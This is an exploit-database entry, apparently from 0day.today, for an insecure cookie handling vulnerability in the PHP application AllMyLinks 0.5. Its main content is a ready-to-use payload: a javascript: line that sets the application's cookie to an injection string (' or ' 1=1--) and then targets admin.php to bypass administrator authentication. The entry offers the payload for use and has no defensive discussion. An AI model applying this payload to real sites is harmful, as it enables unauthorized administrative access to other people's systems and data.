AllMyLinks 0.5 Insecure Cookie Handling Vulnerability

2014-05-29T00:00:00
ID 1337DAY-ID-22293
Type zdt
Reporter JiKo
Modified 2014-05-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ----------[exploit Debut]
[Insecure Cookie Handling Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://www.voice-of-web.de/c-AllMyLinks-s37.html
Version     : 0.5.0
Download    : http://www.voice-of-web.de/media/downloads/AllMyPHP/AllMyLinks/AllMyLinks0.5.0.zip
 
----------[exploit Info]
 
Exploit :
http://Path/admin.php

 javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

----------[exploit Fin]

#  0day.today [2018-01-08]  #